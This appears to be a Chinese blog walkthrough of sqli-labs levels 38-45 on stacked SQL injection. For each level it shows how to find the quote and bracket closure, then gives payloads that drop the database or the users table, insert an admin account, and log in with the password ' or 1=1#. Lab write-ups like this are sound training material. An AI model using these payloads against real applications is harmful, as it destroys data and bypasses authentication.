当前位置: 首页 > news >正文

sqli-labs靶场38-45关(堆叠注入)

目录

less38(堆叠注入1)

less39(堆叠注入2)

less40(堆叠注入3)

 less41(堆叠注入4)

less42(堆叠注入5)

less43(堆叠注入6)

less44(堆叠注入7)

less45(堆叠注入8)



less38(堆叠注入1)

mysqli_multi_query函数——执行多个 SQL 语句,这些语句在字符串 $sql 中用分号分隔。

mysqli_store_result函数——获取第一个查询的结果集,并将其存储在内存中。

mysqli_fetch_row函数——从结果集中获取一行数据,返回一个索引数组。

所以查询只会返回分号前面的结果,不显示后面查询的结果。

但是分号后面可以是执行增删改操作的语句。

分号前面需要闭合,分号后面是需要执行的恶意操作。

比如:

?id=1';drop database security;

?id=1';drop table users;

?id=1';insert into users(username,password) values ('admin1','123456');

要注入的话直接union注入就行。



less39(堆叠注入2)

和less38一样



less40(堆叠注入3)

?id=1'——不正常回显,判断为单引号闭合

?id=1'--+——不正常回显,说明还没有完全闭合

?id=1')--+——正常回显,判断为')闭合

判断好闭合后,利用堆叠注入:

?id=1');drop database security;

?id=1');drop table users;

?id=1');insert into users(username,password) values ('admin1','123456');



 less41(堆叠注入4)

?id=1'不正常回显,?id=1'--+不正常回显

?id=1')--+以及?id=1'))--+都不正常回显,说明可能是数字型

?id=1 and 1=1正常回显,判断为数字型

利用堆叠查询:

?id=1;drop database security;

?id=1;drop table users;

?id=1;insert into users(username,password) values ('admin1','123456');



less42(堆叠注入5)

username随便输

password输入万能密码:' or 1=1#成功登录

——单引号闭合,注入点在password处

利用堆叠注入:

username随便输

password输入:

';drop database security;

';drop table users;

';insert into users(username,password) values ('admin1','123456');



less43(堆叠注入6)

和less42差不多,

username随便输

password输入万能密码:') or 1=1#成功登录

——单引号括号闭合,注入点在password处

利用堆叠注入:

username随便输

password输入:

');drop database security;

');drop table users;

');insert into users(username,password) values ('admin1','123456');



less44(堆叠注入7)

和less42一样:

username随便输

password输入万能密码:' or 1=1#成功登录

——单引号闭合,注入点在password处

利用堆叠注入:

username随便输

password输入:

';drop database security;

';drop table users;

';insert into users(username,password) values ('admin1','123456');



less45(堆叠注入8)

和less43一样:

username随便输

password输入万能密码:') or 1=1#成功登录

——单引号括号闭合,注入点在password处

利用堆叠注入:

username随便输

password输入:

');drop database security;

');drop table users;

');insert into users(username,password) values ('admin1','123456');



http://www.xdnf.cn/news/863929.html

相关文章:

  • MCP协议重构AI Agent生态:万能插槽如何终结工具孤岛?
  • 在 Android 框架中,接口的可见性规则
  • 考研系列—操作系统:冲刺笔记(1-3章)
  • 互斥锁与消息队列的架构哲学
  • 如何用AI高效运营1000+Tiktok矩阵账号
  • 图片压缩工具 | 图片生成PDF文档
  • 将word文件转为kindle可识别的azw3文件的方法
  • AWS DocumentDB vs MongoDB:数据库的技术抉择
  • 在CSDN发布AWS Proton解决方案:实现云原生应用的标准化部署
  • Edge Databases:赋能分布式计算环境
  • PPTAGENT:让PPT生成更智能
  • sqli-labs通关_SQL注入_SQL注入靶场
  • 《树数据结构解析:核心概念、类型特性、应用场景及选择策略》
  • 【WPF】WPF 项目实战:构建一个可增删、排序的光源类型管理界面(含源码)
  • 服务器部署--Flask项目
  • AWS 成本异常检测IAM策略
  • WebFuture:Ubuntu 系统上在线安装.NET Core 8 的步骤
  • GB/T 24507-2020 浸渍纸层压实木复合地板检测
  • 使用 LangChain 和 RAG 实现《斗破苍穹》文本问答系
  • Canal
  • 电脑网络重置,找不到原先自家的WIFI,手机还能正常连接并上网
  • 实时通信RTC与传统直播的异同
  • 代码训练LeetCode(22)研究者H指数
  • 神经网络-Day44
  • 最新MySQL数据库主要版本系列差异比较及新增功能详解
  • DeepSeek 赋能智能零售,解锁动态定价新范式
  • SpringAI集成DeepSeek实战
  • 豆包突然没法用了,一打开就提示网络连接错误
  • Android 颜色百分比对照
  • OA工程自动化办公系统 – 免费Java源码